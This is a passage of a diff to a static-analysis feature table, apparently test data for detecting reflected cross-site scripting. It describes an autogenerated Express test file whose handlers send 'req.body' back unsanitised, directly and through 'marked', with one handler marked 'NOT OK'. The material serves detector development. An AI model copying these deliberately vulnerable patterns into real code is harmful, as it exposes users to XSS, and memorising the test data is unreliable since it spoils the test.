autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:36:21:38 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:36:21:38 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:5 | res | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:10 | res.send | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:20 | exceptional return of res.send(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:20 | exceptional return of res.send(req.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:20 | exceptional return of res.send(req.body) | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:20 | exceptional return of res.send(req.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:20 | exceptional return of res.send(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:20 | res.send(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:20 | res.send(req.body) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:20 | res.send(req.body) | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:20 | res.send(req.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:3:22:20 | res.send(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:7:22:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:7:22:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:7:22:10 | send | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:7:22:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:7:22:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:12:22:14 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:12:22:14 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:12:22:14 | req | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:12:22:14 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:12:22:14 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:12:22:19 | req.body | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:12:22:19 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:12:22:19 | req.body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -19608,6 +132291,46 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:12:22:19 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:12:22:19 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:12:22:19 | req.body | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:16:22:19 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:16:22:19 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:16:22:19 | body | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:16:22:19 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:22:16:22:19 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:5 | res | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:10 | res.send | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:28 | exceptional return of res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:28 | exceptional return of res.sen ... .body)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:28 | exceptional return of res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:28 | exceptional return of res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:28 | exceptional return of res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:28 | res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:28 | res.sen ... .body)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:28 | res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:28 | res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:3:23:28 | res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:7:23:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:7:23:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:7:23:10 | send | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:7:23:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:7:23:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:12:23:17 | marked | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:12:23:17 | marked | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:12:23:17 | marked | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:12:23:17 | marked | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:12:23:17 | marked | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:12:23:27 | exceptional return of marked(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:12:23:27 | exceptional return of marked(req.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:12:23:27 | exceptional return of marked(req.body) | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:12:23:27 | exceptional return of marked(req.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:12:23:27 | exceptional return of marked(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:12:23:27 | marked(req.body) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:12:23:27 | marked(req.body) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:12:23:27 | marked(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -19616,6 +132339,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:12:23:27 | marked(req.body) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:12:23:27 | marked(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:12:23:27 | marked(req.body) | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:19:23:21 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:19:23:21 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:19:23:21 | req | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:19:23:21 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:19:23:21 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:19:23:26 | req.body | CalleeFlexibleAccessPath | marked | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:19:23:26 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:19:23:26 | req.body | calleeImports | marked | @@ -19624,12 +132352,51 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:19:23:26 | req.body | enclosingFunctionBody | req res res send req body res send marked req body | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:19:23:26 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:19:23:26 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:23:23:26 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:23:23:26 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:23:23:26 | body | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:23:23:26 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:23:23:23:26 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:5:27:9 | table | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:5:27:9 | table | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:5:27:9 | table | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:5:27:9 | table | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:5:27:37 | table | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:5:27:37 | table | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:5:27:37 | table | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:5:27:37 | table = ... table') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:5:27:37 | table = ... table') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:5:27:37 | table = ... table') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:13:27:19 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:13:27:19 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:13:27:19 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:13:27:37 | exceptional return of require ... table') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:13:27:37 | exceptional return of require ... table') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:13:27:37 | exceptional return of require ... table') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:13:27:37 | require ... table') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:13:27:37 | require ... table') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:13:27:37 | require ... table') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:21:27:36 | 'markdown-table' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:21:27:36 | 'markdown-table' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:21:27:36 | 'markdown-table' | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:21:27:36 | 'markdown-table' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:21:27:36 | 'markdown-table' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:27:21:27:36 | 'markdown-table' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:1:28:3 | app | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:1:28:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:1:28:3 | app | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:1:28:7 | app.get | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:1:28:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:1:28:7 | app.get | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:1:35:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:1:35:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:1:35:2 | app.get ... T OK\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:1:35:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:1:35:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:1:35:2 | exceptional return of app.get ... T OK\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:5:28:7 | get | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:5:28:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:5:28:7 | get | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:9:28:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:9:28:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:9:28:19 | '/user/:id' | calleeImports | express | @@ -19637,6 +132404,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:9:28:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:9:28:19 | '/user/:id' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:9:28:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:28:21 | table | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:28:21 | table | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:28:21 | table | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:28:21 | table | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:28:21 | table | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:28:21 | this | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:28:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:28:21 | this | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:28:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:28:21 | this | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | 'arguments' object of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | exceptional return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | exceptional return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | functio ... OT OK\\n} | calleeImports | express | @@ -19644,6 +132431,61 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | functio ... OT OK\\n} | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | functio ... OT OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | return of anonymous function | 